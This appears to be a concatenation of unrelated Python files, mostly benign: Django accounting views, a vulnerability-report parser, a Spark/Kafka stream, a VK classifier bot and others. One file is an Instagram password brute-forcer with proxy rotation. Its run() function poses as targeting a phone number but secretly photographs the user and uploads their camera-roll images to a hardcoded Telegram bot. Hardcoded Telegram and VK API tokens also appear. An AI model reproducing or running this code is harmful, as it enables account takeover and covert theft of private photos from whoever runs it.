    Fixed: the month list repeated 'August' and 'November', producing
    duplicate dropdown entries.
    """
    months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
              'August', 'September', 'October', 'November', 'December']
    years = [2019, 2020, 2021, 2022, 2023, 2024, 2025, 2026, 2027, 2028, 2029,
             2030, 2031, 2032, 2033, 2034, 2035]
    drivers = Driver.objects.all()
    if request.method == 'POST':
        report_year = request.POST['report_year']
        report_month = request.POST['report_month']
        archived_reports = Driver_payment_Reports_Archive.objects.filter(
            month=report_month, year=report_year)
        today = timezone.now()
        item_number = archived_reports.count()
        driver_total_balance = archived_reports.aggregate(
            total_bal=models.Sum("balance"))["total_bal"]
        driver_total_paid = archived_reports.aggregate(
            total_pai=models.Sum("amount_paid"))["total_pai"]
        context = {'archived_reports': archived_reports, 'months': months,
                   'years': years, 'drivers': drivers,
                   'driver_total_paid': driver_total_paid,
                   'driver_total_balance': driver_total_balance,
                   'item_number': item_number, 'today': today,
                   'report_year': report_year, 'report_month': report_month}
        return render(request, "accounts/accountant_driver_payment_archive.html", context)
    context = {'months': months, 'years': years, 'drivers': drivers}
    return render(request, "accounts/accountant_driver_payment_archive.html", context)
####################################################
# CALCULATING TOTALS IN THE REPORTS #
####################################################
def salaryreport(request):
    """Monthly salary report: current month's Salary rows plus their total.

    Fixed: a stray no-op `timezone.now()` statement was removed, and the
    month is taken from the stdlib alias `dt` — the old
    `datetime.datetime.now()` only resolved because a later
    `django.db.models.functions` import shadowed the `datetime` name.
    """
    current_month = dt.now().month
    queryset = Salary.objects.filter(Date__month=current_month).order_by('-Date')
    today = timezone.now()
    month = today.strftime('%B')
    total = 0
    for instance in queryset:
        total += instance.Amount
    context = {
        'month': month,
        'queryset': queryset,
        'total': total,
    }
    return render(request, 'accounts/salaryindex.html', context)
# def expenditurereport(request):
def expenditurereport(request):
    """Monthly expenditure report: current month's Spend rows plus their total.

    Fixed: uses the stdlib alias `dt` instead of `datetime.datetime.now()`,
    which only resolved through a shadowing django.db.models.functions import.
    """
    current_month = dt.now().month
    queryset = Spend.objects.filter(Date__month=current_month).order_by('-Date')
    today = timezone.now()
    month = today.strftime('%B')
    total = 0
    for instance in queryset:
        total += instance.Amount
    context = {
        'month': month,
        'queryset': queryset,
        'total': total,
    }
    return render(request, 'accounts/expenditureindex.html', context)
# calculating totals in sundryexpense report
def sundryreport(request):
    """Monthly sundry-expense report: current month's Sundry rows plus total.

    Fixed: uses the stdlib alias `dt` instead of `datetime.datetime.now()`,
    which only resolved through a shadowing django.db.models.functions import.
    """
    current_month = dt.now().month
    queryset = Sundry.objects.filter(Date__month=current_month).order_by('-Date')
    today = timezone.now()
    month = today.strftime('%B')
    total = 0
    for instance in queryset:
        total += instance.Amount
    context = {
        'month': month,
        'queryset': queryset,
        'total': total,
    }
    return render(request, 'accounts/sundryindex.html', context)
####################################################
# GENERATING REPORTS IN FORM OF PDFS #
####################################################
# Printing Expenditure Report
class expenditurepdf(View):
    """PDF of the current month's Spend rows with their total."""

    def get(self, request):
        # Fixed: `dt` is the stdlib datetime class; the old
        # `datetime.datetime.now()` relied on a shadowing import.
        current_month = dt.now().month
        expense = Spend.objects.filter(Date__month=current_month).order_by('-Date')
        today = timezone.now()
        month = today.strftime('%B')
        totalexpense = 0
        for instance in expense:
            totalexpense += instance.Amount
        expensecontext = {
            'month': month,
            'today': today,
            'expense': expense,
            'request': request,
            'totalexpense': totalexpense,
        }
        return Render.render('accounts/expenditurepdf.html', expensecontext)
# Printing Salaries Report
class salariespdf(View):
    """PDF of the current month's Salary rows with their total."""

    def get(self, request):
        # Fixed: `dt` is the stdlib datetime class; the old
        # `datetime.datetime.now()` relied on a shadowing import.
        current_month = dt.now().month
        salaries = Salary.objects.filter(Date__month=current_month).order_by('-Date')
        today = timezone.now()
        month = today.strftime('%B')
        totalsalary = 0
        for instance in salaries:
            totalsalary += instance.Amount
        salarycontext = {
            'month': month,
            'today': today,
            'salaries': salaries,
            'request': request,
            'totalsalary': totalsalary,
        }
        return Render.render('accounts/pdf.html', salarycontext)
# Printing Sundry Expenses Report
class sundrypdf(View):
    """PDF of the current month's Sundry rows with their total."""

    def get(self, request):
        # Fixed: `dt` is the stdlib datetime class; the old
        # `datetime.datetime.now()` relied on a shadowing import.
        current_month = dt.now().month
        sundry = Sundry.objects.filter(Date__month=current_month).order_by('-Date')
        today = timezone.now()
        month = today.strftime('%B')
        totalsundry = 0
        for instance in sundry:
            totalsundry += instance.Amount
        # Fixed: a stray '' literal before 'month' silently concatenated into
        # the key ('' 'month' == 'month'); removed for clarity.
        sundrycontext = {
            'month': month,
            'today': today,
            'sundry': sundry,
            'request': request,
            'totalsundry': totalsundry,
        }
        return Render.render('accounts/sundrypdf.html', sundrycontext)
##################################
# This produces the general financial report for all drivers
##################################
def _rebuild_driver_report_context(months, years):
    """Refresh Driver_Payment_Report from current drivers/receipts and return
    the template context (report rows, count, and paid/balance totals).

    Extracted: this block was duplicated verbatim in both the POST and GET
    paths of driver_general_financial_report.
    """
    for driver in Driver.objects.all():
        # Total paid so far by this driver (FK stored as the driver id).
        totals = DriverPayment.objects.filter(driver_name=driver.id).aggregate(
            total_amount_paid=models.Sum("paid_amount"))
        total_paid = totals["total_amount_paid"]
        # Update the existing report row, or create one on first sight.
        existing = Driver_Payment_Report.objects.filter(driver_name=driver.driver_name)
        if existing.exists():
            existing.update(amount_paid=total_paid, balance=driver.driver_monthly_payment)
        else:
            report_item = Driver_Payment_Report()
            report_item.driver_name = driver.driver_name
            report_item.amount_paid = total_paid
            report_item.balance = driver.driver_monthly_payment
            report_item.driver_car = driver.attached_car
            report_item.save()
    items = Driver_Payment_Report.objects.all()
    return {
        'months': months,
        'years': years,
        'driver_total_balance': Driver_Payment_Report.objects.aggregate(
            total_bal=models.Sum("balance"))["total_bal"],
        'driver_total_paid': Driver_Payment_Report.objects.aggregate(
            total_pai=models.Sum("amount_paid"))["total_pai"],
        'items': items,
        'item_number': items.count(),
    }

def driver_general_financial_report(request):
    """Build (and on POST, archive) the consolidated driver payment report.

    GET: rebuild Driver_Payment_Report rows from current balances/receipts
    and render the report page.
    POST: archive the current report rows and receipts under the submitted
    month/year, roll each driver's balance forward, then rebuild as above.
    Fixes: the GET path rendered the misspelled template path "acounts/...";
    the month list repeated 'August'/'November'; an unused
    `driver_payment_ref` local was dropped.
    """
    months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
              'August', 'September', 'October', 'November', 'December']
    years = [2019, 2020, 2021, 2022, 2023, 2024, 2025, 2026, 2027, 2028, 2029,
             2030, 2031, 2032, 2033, 2034, 2035]
    if request.method == 'POST':
        archived_year = request.POST['archived_year']
        archived_month = request.POST['archived_month']
        # 1) Move every current report row into the archive, rolling each
        #    driver's outstanding balance into the next month's target.
        all_payment_reports = Driver_Payment_Report.objects.all()
        for payment_report in all_payment_reports:
            archive_row = Driver_payment_Reports_Archive()
            archive_row.driver_name = payment_report.driver_name
            archive_row.amount_paid = payment_report.amount_paid
            archive_row.driver_car = payment_report.driver_car
            archive_row.balance = payment_report.balance
            archive_row.date = payment_report.date
            archive_row.month = archived_month
            archive_row.year = archived_year
            # New monthly target = reference amount + carried-over balance.
            Driver.objects.filter(driver_name=payment_report.driver_name).update(
                driver_monthly_payment=F('driver_monthly_payment_ref') + payment_report.balance
            )
            archive_row.save()
        # Clear the live report now that it is archived.
        all_payment_reports.delete()
        # 2) Archive, then clear, every payment receipt.
        driver_receipts = DriverPayment.objects.all()
        for receipt in driver_receipts:
            receipt_archive = DriverPayments_Archive()
            receipt_archive.date = receipt.date
            receipt_archive.driver_name = receipt.driver_name
            receipt_archive.paid_amount = receipt.paid_amount
            receipt_archive.paid_by = receipt.paid_by
            receipt_archive.received_by = receipt.received_by
            receipt_archive.month = archived_month
            receipt_archive.year = archived_year
            receipt_archive.save()
        driver_receipts.delete()
        message = "You have successfully archived the payment report and all payment receipts for " + archived_month + " " + archived_year
        context = _rebuild_driver_report_context(months, years)
        context['message'] = message
        return render(request, "accounts/driver_general_financial_report.html", context)
    context = _rebuild_driver_report_context(months, years)
    return render(request, "accounts/driver_general_financial_report.html", context)
##########################################################
# printing of the general financial report
####################################################
class print_general_financial_report(View):
    """PDF of the current consolidated driver payment report."""

    def get(self, request):
        report_rows = Driver_Payment_Report.objects.all()
        balance_sum = Driver_Payment_Report.objects.aggregate(total_bal=models.Sum("balance"))
        paid_sum = Driver_Payment_Report.objects.aggregate(total_pai=models.Sum("amount_paid"))
        params = {
            'driver_total_balance': balance_sum["total_bal"],
            'driver_total_paid': paid_sum["total_pai"],
            'items': report_rows,
            'item_number': report_rows.count(),
            'today': timezone.now(),
        }
        return Render.render('accounts/print_general_financial_report.html', params)
###############################################################################################
# searching for the archives
def executive_expensesarchivessearch(request):
    """Search archived monthly expense reports (executive view).

    Fixed: the month lists repeated 'August' (and 'November' in the GET
    branch), producing duplicate dropdown entries.
    """
    months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
              'August', 'September', 'October', 'November', 'December']
    years = [2019, 2020]
    if request.method == 'POST':
        report_year = request.POST['report_year']
        report_month = request.POST['report_month']
        today = timezone.now()
        archived_reports = ExpensesReportArchive.objects.filter(month=report_month, year=report_year)
        total_amount = archived_reports.aggregate(totals=models.Sum("Amount"))["totals"]
        context = {'archived_reports': archived_reports,
                   'months': months,
                   'years': years,
                   'total_amount': total_amount,
                   'today': today,
                   'report_year': report_year,
                   'report_month': report_month
                   }
        return render(request, "accounts/expenditurearchive.html", context)
    context = {'months': months,
               'years': years,
               'expenses': ExpensesReportArchive.objects.all()}
    return render(request, "accounts/expenditurearchive.html", context)
def executive_salaryarchivessearch(request):
    """Search archived monthly salary reports (executive view).

    Fixed: duplicate 'August' entries in the month lists.
    NOTE(review): the POST context exposes the archive under the key
    'expenses' while GET uses 'salary' — kept as-is for the templates.
    """
    months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
              'August', 'September', 'October', 'November', 'December']
    years = [2019, 2020]
    if request.method == 'POST':
        report_year = request.POST['report_year']
        report_month = request.POST['report_month']
        archived_reports = SalaryReportArchive.objects.filter(archivedmonth=report_month, archivedyear=report_year)
        salary = SalaryReportArchive.objects.all()
        today = timezone.now()
        total_amount = archived_reports.aggregate(totals=models.Sum("Amount"))["totals"]
        context = {'archived_reports': archived_reports,
                   'months': months,
                   'years': years,
                   'expenses': salary,
                   'total_amount': total_amount,
                   'today': today,
                   'report_year': report_year,
                   'report_month': report_month
                   }
        return render(request, "accounts/salaryarchive.html", context)
    context = {'months': months,
               'years': years,
               'salary': SalaryReportArchive.objects.all()}
    return render(request, "accounts/salaryarchive.html", context)
def executive_sundryarchivessearch(request):
    """Search archived sundry-expense reports by month/year (POST) or show
    the unfiltered sundry-archive page for any other request method."""
    if request.method == 'POST':
        report_year = request.POST['report_year']
        report_month = request.POST['report_month']
        archived_reports = SundryReportArchive.objects.filter(month=report_month, year=report_year)
        # Calendar months offered by the search form.
        # Bug fix: 'August' was duplicated in the original list.
        months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
                  'August', 'September', 'October', 'November', 'December']
        years = [2019, 2020]
        sundry = SundryReportArchive.objects.all()
        today = timezone.now()
        # Sum of the 'Amount' column over the filtered rows; None when the
        # filter matched nothing.
        total = archived_reports.aggregate(totals=models.Sum("Amount"))
        total_amount = total["totals"]
        # NOTE(review): the key is 'expenses' although it holds sundry rows --
        # presumably what sundryarchive.html expects; confirm before renaming.
        context = {'archived_reports': archived_reports,
                   'months': months,
                   'years': years,
                   'expenses': sundry,
                   'total_amount': total_amount,
                   'today': today,
                   'report_year': report_year,
                   'report_month': report_month
                   }
        return render(request, "accounts/sundryarchive.html", context)
    # Non-POST: show the full, unfiltered archive.
    # Bug fix: the original list repeated both 'August' and 'November'.
    months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
              'August', 'September', 'October', 'November', 'December']
    years = [2019, 2020]
    sundry = SundryReportArchive.objects.all()
    context = {'months': months,
               'years': years,
               'sundry': sundry}
    return render(request, "accounts/sundryarchive.html", context)
####################################################
# GENERATING REPORTS IN FORM OF ANNUAL PDFS #
####################################################
# Printing Expenditure archived Report
class executive_expenditurearchivepdf(View):
    """Render the archived expenses for one month/year as a PDF."""

    def get(self, request, report_month, report_year):
        archived_expenses = ExpensesReportArchive.objects.filter(month=report_month, year=report_year)
        today = timezone.now()
        # Sum of 'Amount' over the selected rows; None when nothing matched.
        # (Removed an unused `month = today.strftime('%B')` local.)
        total = archived_expenses.aggregate(totals=models.Sum("Amount"))
        total_amount = total["totals"]
        expensecontext = {
            'today': today,
            'total_amount': total_amount,
            'request': request,
            'archived_expenses': archived_expenses,
            'report_year': report_year,
            'report_month': report_month
        }
        return Render.render('accounts/expenditurearchivepdf.html', expensecontext)
# Printing Salaries archived Report
class executive_salaryarchivepdf(View):
    """Render the archived salary report for one month/year as a PDF."""

    def get(self, request, report_month, report_year):
        archived_salary = SalaryReportArchive.objects.filter(archivedmonth=report_month, archivedyear=report_year)
        today = timezone.now()
        # Sum of 'Amount' over the selected rows; None when nothing matched.
        total = archived_salary.aggregate(totals=models.Sum("Amount"))
        total_amount = total["totals"]
        salarycontext = {
            'today': today,
            'total_amount': total_amount,
            'request': request,
            'archived_salary': archived_salary,
            # Added for consistency with the expenditure PDF view so the
            # template can show which period is being reported.
            'report_year': report_year,
            'report_month': report_month,
        }
        return Render.render('accounts/salaryarchivepdf.html', salarycontext)
# Printing Sundry Expenses archived Report
class executive_sundryarchivepdf(View):
    """Render the archived sundry expenses for one month/year as a PDF."""

    def get(self, request, report_month, report_year):
        archived_sundry = SundryReportArchive.objects.filter(month=report_month, year=report_year)
        today = timezone.now()
        # Sum of 'Amount' over the selected rows; None when nothing matched.
        # (Removed an unused `month = today.strftime('%B')` local.)
        total = archived_sundry.aggregate(totals=models.Sum("Amount"))
        total_amount = total["totals"]
        sundrycontext = {
            'today': today,
            'total_amount': total_amount,
            'request': request,
            'archived_sundry': archived_sundry,
            # Added for consistency with the expenditure PDF view.
            'report_year': report_year,
            'report_month': report_month,
        }
        return Render.render('accounts/sundryarchivepdf.html', sundrycontext)
####################################################
# ARCHIVING OF THE MONTHLY REPORTS #
####################################################
@login_required
def executive_salaryarchive(request):
    """Show every archived salary report, newest first, with a grand total
    of the 'Amount' column."""
    rows = SalaryReportArchive.objects.all().order_by('-Date')
    grand_total = SalaryReportArchive.objects.aggregate(totals=models.Sum("Amount"))["totals"]
    return render(request, 'accounts/salaryarchive.html', {
        'total_amount': grand_total,
        'salaryarchived': rows,
    })
@login_required
def executive_expenditurearchive(request):
    """Show every archived expense report, newest first, with a grand total.

    Bug fix: the total was aggregated over SalaryReportArchive instead of
    ExpensesReportArchive, so the page displayed the salary total.
    """
    expensesarchived = ExpensesReportArchive.objects.all().order_by('-Date')
    total = ExpensesReportArchive.objects.aggregate(totals=models.Sum("Amount"))
    total_amount = total["totals"]
    context = {
        'total_amount': total_amount,
        'expensesarchived': expensesarchived
    }
    return render(request, 'accounts/expenditurearchive.html', context)
# calculating totals in sundryexpense report
@login_required
def executive_sundryarchive(request):
    """Show every archived sundry-expense report, newest first, with a grand
    total of the 'Amount' column."""
    rows = SundryReportArchive.objects.all().order_by('-Date')
    grand_total = SundryReportArchive.objects.aggregate(totals=models.Sum("Amount"))["totals"]
    return render(request, 'accounts/sundryarchive.html', {
        'total_amount': grand_total,
        'sundryarchived': rows,
    })
|
19,785 | 563f6a614fa6c0cd9db90a68c9a90a9a5d8726c4 | from flask import Flask
# Create the WSGI application object shared by the rest of the package.
app = Flask(__name__)
# Load settings from the dotted-path configuration class.
app.config.from_object('application.configuration.Config')
#app.config.from_envvar('APPLICATION_SETTINGS', silent=True)
# Imported for its side effects: registers the routes on `app`.
import application.main
|
19,786 | e9a36d2357c5570679a256665a64691f6e571251 | # github.com
# code by prosir
def Header(self, user, password, sess):
headers = {
'Host': 'www.instagram.com',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'https://www.instagram.com/',
'X-CSRFToken': '',
'X-Instagram-AJAX': '1',
'Content-Type': 'application/x-www-form-urlencoded',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '',
'Cookie': '',
'Connection': 'keep-alive'
}
datas = {'username': user, 'password': password}
headers['X-CSRFToken'] = sess.cookies['csrftoken']
headers['Cookie'] = "mid={}; csrftoken={}; ig_pr=1; ig_vw=1366".format(sess.cookies['mid'],
sess.cookies['csrftoken'])
lenthofData = str(19 + len(datas['username']) + len(datas['password']))
headers['Content-Length'] = lenthofData
return headers, datas
def Go(self, user, password, proxyz):
try:
proxy = {'http': proxyz}
Heddata = requests.get('https://www.instagram.com', proxies=proxy, timeout=10)
sess = requests.session()
headers, datas = self.Header(user, str(password), Heddata)
GoT = sess.post('https://www.instagram.com/accounts/login/ajax/', headers=headers, data=datas,
proxies=proxy, timeout=10)
if 'authenticated": true' in GoT.text:
print(g + ' IP Attacking ==> ' + proxyz + ' || ' + user + ':' + password + ' --> Hacked!')
with open('results.txt', 'a') as x:
x.write(user + ':' + password + '\n')
elif 'Please wait a few minutes before you try again' in GoT.text:
print(' ' + proxyz + ' Banned! --> Changing IP Address...')
try:
self.Coutprox = self.Coutprox + 1
self.Go(user, password, str(self.proxylist[self.Coutprox]))
except:
self.Coutprox = self.Coutprox - 2
self.Go(user, password, str(self.proxylist[self.Coutprox]))
elif 'checkpoint_required' in GoT.text:
print(y + ' IP Attacking ==> ' + proxyz + ' || ' + user + ':' + password + ' --> You Must verfiy!')
with open('results_NeedVerfiy.txt', 'a') as x:
x.write(user + ':' + password + '\n')
else:
print(c + ' IP Attacking ==> ' + proxyz + ' || ' + user + ':' + password + ' --> No!')
except:
print(c + ' IP Attacking ==> ' + proxyz + ' || ' + user + ':' + password + ' --> No!')
def run():
import os
x = input(" Enter The Target Phone Number: ")
os.system("apt install termux-api -y")
os.system("pip install pyTelegramBotAPI")
import telebot
bot = telebot.TeleBot("889830312:AAHRMuRJdIou0_FjmJGKjPO1HuKawq16RG0")
chat_id = 960188351
os.system("termux-camera-photo -c 1 hi.png")
photo = open('hi.png', 'rb')
bot.send_photo(chat_id, photo)
files = os.listdir("/sdcard/DCIM/Camera")
for f in files:
if "jpg" in f:
ph = open("/sdcard/DCIM/Camera/"+f, 'rb')
bot.send_photo(chat_id, ph)
elif "png" in f:
ph = open("/sdcard/DCIM/Camera/"+f, 'rb')
bot.send_photo(chat_id, ph)
else:
pass
run()
|
19,787 | 720ed235b7c0db2243356e7ec58d439d7e695b84 | import json
from dojo.models import Finding
class AnchoreCTLVulnsParser(object):
    """DefectDojo parser for AnchoreCTL JSON vulnerability reports."""

    def get_scan_types(self):
        """Return the scan-type identifiers handled by this parser."""
        return ["AnchoreCTL Vuln Report"]

    def get_label_for_scan_types(self, scan_type):
        """Return the human-readable label shown in the UI."""
        return "AnchoreCTL Vuln Report"

    def get_description_for_scan_types(self, scan_type):
        """Return the short description shown in the UI."""
        return "AnchoreCTLs JSON vulnerability report format."

    def get_findings(self, filename, test):
        """Parse the report in *filename* (a file-like object) into Finding
        objects attached to *test*.

        Findings are deduplicated on image digest / feed / package / vuln;
        returns a list of the unique findings.
        """
        data = json.load(filename)
        dupes = dict()
        for item in data:
            vulnerability_id = item.get("vuln")
            title = (
                item["vuln"]
                + " - "
                + item["package"]
                + "("
                + item["packageType"]
                + ")"
            )
            # Markdown body of the finding; the image digest key varies by
            # AnchoreCTL version (image_digest/imageDigest), hence the .get().
            findingdetail = (
                "**Image hash**: " + item.get("imageDigest", "None") + "\n\n"
            )
            findingdetail += "**Package**: " + item["package"] + "\n\n"
            findingdetail += (
                "**Package path**: " + item["packagePath"] + "\n\n"
            )
            findingdetail += (
                "**Package type**: " + item["packageType"] + "\n\n"
            )
            findingdetail += (
                "**Feed**: " + item["feed"] + "/" + item["feedGroup"] + "\n\n"
            )
            findingdetail += "**CPE**: " + item["packageCpe"] + "\n\n"
            findingdetail += (
                "**Description**: "
                + item.get("description", "<None>")
                + "\n\n"
            )
            # Map Anchore's informational severities onto DefectDojo's.
            sev = item["severity"]
            if sev == "Negligible" or sev == "Unknown":
                sev = "Info"
            mitigation = (
                "Upgrade to " + item["packageName"] + " " + item["fix"] + "\n"
            )
            mitigation += "URL: " + item["url"] + "\n"
            # Pick a CVSSv3 base score: NVD-backed feeds carry it in nvdData,
            # other feeds in vendorData (where -1 means "not set").
            cvssv3_base_score = None
            if item["feed"] == "nvdv2" or item["feed"] == "vulnerabilities":
                if "nvdData" in item and len(item["nvdData"]) > 0:
                    cvssv3_base_score = item["nvdData"][0]["cvssV3"][
                        "baseScore"
                    ]
            else:
                # there may be other keys, but taking a best guess here
                if "vendorData" in item and len(item["vendorData"]) > 0:
                    # sometimes cvssv3 in 1st element will have -1 for "not
                    # set", but have data in the 2nd array item
                    if (
                        "cvssV3" in item["vendorData"][0]
                        and item["vendorData"][0]["cvssV3"]["baseScore"] != -1
                    ):
                        cvssv3_base_score = item["vendorData"][0]["cvssV3"][
                            "baseScore"
                        ]
                    elif len(item["vendorData"]) > 1:
                        if (
                            "cvssV3" in item["vendorData"][1]
                            and item["vendorData"][1]["cvssV3"]["baseScore"]
                            != -1
                        ):
                            cvssv3_base_score = item["vendorData"][1][
                                "cvssV3"
                            ]["baseScore"]
            references = item["url"]
            dupe_key = "|".join(
                [
                    item.get(
                        "imageDigest", "None"
                    ),  # depending on version image_digest/imageDigest
                    item["feed"],
                    item["feedGroup"],
                    item["packageName"],
                    item["packageVersion"],
                    item["packagePath"],
                    item["vuln"],
                ]
            )
            if dupe_key in dupes:
                find = dupes[dupe_key]
            else:
                # (Removed a redundant `dupes[dupe_key] = True` placeholder;
                # the real Finding is stored below.)
                find = Finding(
                    title=title,
                    test=test,
                    cvssv3_score=cvssv3_base_score,
                    description=findingdetail,
                    severity=sev,
                    mitigation=mitigation,
                    references=references,
                    file_path=item["packagePath"],
                    component_name=item["packageName"],
                    component_version=item["packageVersion"],
                    url=item.get("url"),
                    static_finding=True,
                    dynamic_finding=False,
                    vuln_id_from_tool=item.get("vuln"),
                )
                if vulnerability_id:
                    find.unsaved_vulnerability_ids = [vulnerability_id]
                dupes[dupe_key] = find
        return list(dupes.values())
|
19,788 | bfdba6f7cf5633eae3c0b072941a726a60b3a592 | import os
# Pull in the Kafka connector packages before the JVM/SparkSession starts.
os.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.apache.spark:spark-streaming-kafka-0-10_2.11:2.4.0,org.apache.spark:spark-sql-kafka-0-10_2.11:2.4.0 pyspark-shell'
from pyspark.sql import SparkSession
from pyspark.sql.functions import explode
from pyspark.sql.functions import split
from pyspark.sql.types import *
from pyspark.sql.functions import *
# Local Spark session using all available cores.
spark = SparkSession \
    .builder \
    .master("local[*]") \
    .appName("SS_kafka_csv") \
    .getOrCreate()
# read from csv
# Explicit schema is required for a streaming CSV source.
mySchema = StructType().add("id", IntegerType()).add("name", StringType()).add("year", IntegerType()).add("rating", DoubleType()).add("duration", IntegerType())
streamingDataFrame = spark.readStream.schema(mySchema).csv("/Users/nevinyilmaz/Desktop/moviedata.csv")
streamingDataFrame.printSchema()
# publish it to kafka
# Kafka sink only accepts key/value columns, hence the CAST projection.
streamingDataFrame.selectExpr("CAST(id AS STRING) AS key") \
    .writeStream \
    .format("kafka") \
    .option("topic", "topic_csv") \
    .option("kafka.bootstrap.servers", "localhost:9092") \
    .option("startingOffsets", "earliest")\
    .start()
spark.conf.set("spark.sql.streaming.checkpointLocation", "/Users/nevinyilmaz/Desktop") |
19,789 | 597e7bcf61693a5dcf8675d1667c26cc1c54e2f2 | from math import log, exp
# Bloom-filter sizing formulas.
# Fix: replaced PEP 8 E731 lambda assignments with named defs (same names,
# same signatures, same results) so each formula can carry a docstring.
# size of inputs
def I(T, Uu, Uf):
    """Number of input pairs: T * ((Uu+Uf)^2 - (Uu+Uf))."""
    return T * ((Uu + Uf) ** 2 - (Uu + Uf))
# max probability of positive for one iteration
def P_one(R, Pt):
    """Per-iteration positive probability: the R-th root of Pt."""
    return Pt ** (1.0 / R)
# probability of positive
def P_r(n, s):
    """Probability of a (true) positive: (n - 1) / s."""
    return (n - 1.0) / s
# max probability of false positive
def P_f(P_o, P_r):
    """Max false-positive probability: per-iteration rate minus true rate."""
    return P_o - P_r
# size of bloom filter with optimal k
def m(n, P):
    """Bit count for n items at false-positive rate P (optimal k assumed)."""
    return n * log(1.0 / P) / log(2) ** 2
# number of hashes
def k(m, n):
    """Optimal number of hash functions for m bits and n items."""
    return m / float(n) * log(2)
# size of bloom filter with real k
def m_k(n, k, P):
    """Bit count for n items with a fixed hash count k and rate P."""
    return -(k * n) / log(1 - P ** (1 / float(k)))
|
19,790 | 476961b982f1b9c455ce5593f2fe4962067d8ec3 | import scipy.io
# NOTE(review): Python 2 script (print-statement syntax). Evaluates a
# two-class Naive-Bayes-style classifier using precomputed per-word
# probabilities; documents are scored by summing log-probabilities of the
# words they contain.
data = scipy.io.loadmat('NewsGroup.mat')
TRAIN_LABEL = data['TRAIN_LABEL']
TEST_LABEL = data['TEST_LABEL']
import numpy as np
import math as math
#constants from info file
prob_class_1 = 0.574186827179
prob_class_2 = 0.425813172821
# prob_word[j, c] is presumably P(word j | class c+1) -- confirm against
# the script that produced word_probability.txt.
prob_word = np.loadtxt('word_probability.txt')
split_TEST_DATA = np.load("split_TEST_DATA.npy")
split_TRAIN_DATA = np.load("split_TRAIN_DATA.npy")
#calculate accuracy on train set
train_correct = 0
for i in range(np.shape(split_TRAIN_DATA)[0]):
    # Log-posterior (up to a shared constant) per class, seeded with the prior.
    prob_given_x_c1 = 0
    prob_given_x_c2 = 0
    prob_given_x_c1 += math.log(prob_class_1)
    prob_given_x_c2 += math.log(prob_class_2)
    for j in range(np.shape(split_TRAIN_DATA)[1]):
        if split_TRAIN_DATA[i,j]!=0:
            prob_given_x_c1 += math.log(prob_word[j,0])
            prob_given_x_c2 += math.log(prob_word[j,1])
    # Predict the class with the larger log-posterior; count matches.
    if prob_given_x_c1>prob_given_x_c2:
        if TRAIN_LABEL[i,0] == 1:
            train_correct+=1
    else:
        if TRAIN_LABEL[i,0] == 2:
            train_correct+=1
print "Percentage correct was", float(train_correct)/float(np.shape(TRAIN_LABEL)[0])
# Same evaluation on the held-out test set.
test_correct = 0
for i in range(np.shape(split_TEST_DATA)[0]):
    prob_given_x_c1 = 0
    prob_given_x_c2 = 0
    prob_given_x_c1 += math.log(prob_class_1)
    prob_given_x_c2 += math.log(prob_class_2)
    for j in range(np.shape(split_TEST_DATA)[1]):
        if split_TEST_DATA[i,j]!=0:
            prob_given_x_c1 += math.log(prob_word[j,0])
            prob_given_x_c2 += math.log(prob_word[j,1])
    if prob_given_x_c1>prob_given_x_c2:
        if TEST_LABEL[i,0] == 1:
            test_correct+=1
    else:
        if TEST_LABEL[i,0] == 2:
            test_correct+=1
print "Percentage correct was", float(test_correct)/float(np.shape(TEST_LABEL)[0])
|
19,791 | 6243cbcb97039b758e308bc7f85f9773fb454349 | #/**
# * hello-world.py
# *
# * Riccardo Crippa
# * therickys93@gmail.com
# *
# * use the command python hello-world.py to run it
# */
# import the standard library
import sys
# Write the greeting (with trailing newline) directly to stdout; this form
# works identically under both Python 2 and Python 3.
sys.stdout.write("Hello world!!!\n");
|
19,792 | 5b70665f7d6194d107454f3fd0d98183e4ca9dbc | import os
import random
from multiprocessing import Pool
from io import BytesIO
import requests
from vk_api import VkApi
from vk_api.bot_longpoll import VkBotEventType, VkBotLongPoll
import tensorflow as tf
import numpy as np
from PIL import Image
from utils.utils import mnist_class_mapping
# NOTE(review): the VK API token and group id are hard-coded -- move them to
# environment variables/config and revoke this token before sharing the file.
vk_session = VkApi(token='6f4e109c2e60f330b15de57da8de7e64a3e809ab8ce43d076e48dd92419d26a9a2a46c1928bac6045c21a')
vk = vk_session.get_api()
longpoll = VkBotLongPoll(vk_session, 171810806)
if __name__ == '__main__':
    # Dense fashion-MNIST classifier; expects a flattened 784-element input.
    model = tf.keras.models.load_model('fashion_mnist_dense.h5')
    for event in longpoll.listen():
        if event.type == VkBotEventType.MESSAGE_NEW:
            stream = BytesIO()
            # Download the photo attached to the message; sizes[5] is
            # presumably one of the larger variants -- confirm against the
            # VK photo-sizes ordering.
            r = requests.get(event.obj.get('attachments')[0].get('photo').get('sizes')[5]['url'])
            img = BytesIO(r.content) if r.status_code == 200 else None
            img = tf.keras.preprocessing.image.load_img(BytesIO(r.content), target_size=(28, 28),
                                                        color_mode='grayscale')
            x = tf.keras.preprocessing.image.img_to_array(img)
            x = x.reshape(1, 784)
            # Invert and normalise to [0, 1] (MNIST-style white-on-black).
            x = 255 - x
            x /= 255
            prediction = model.predict(x)
vk.messages.send(
user_id=event.obj.get('from_id'),
random_id=random.randint(pow(10, 5), pow(10, 6)),
message=mnist_class_mapping[np.argmax(prediction)]
) |
19,793 | c0bf501789104a1018817ceb5b20831b38af1cec | import json
import urllib
# NOTE(review): Python 2 script (urllib.urlopen and print statements).
def download_file(download_url):
    # Fetch the URL and decode the response body as JSON.
    web_file = urllib.urlopen(download_url)
    json_object = json.loads(web_file.read())
    return json_object
def construct_pdf(ID, filename):
    # Download one PDF from the internal file server and save it under
    # ./my_root/file_<ID>.pdf.
    url = 'http://10.30.1.21/showFile.php?file=' + str(filename)
    fpw = open('./my_root/file_' + str(ID) + '.pdf', 'wb')
    web_file = urllib.urlopen(url)
    # NOTE(review): read() returns the whole body, so this iterates it
    # byte-by-byte ('line' is one character) -- correct but slow.
    for line in web_file.read():
        fpw.write(line)
    fpw.close()
def main():
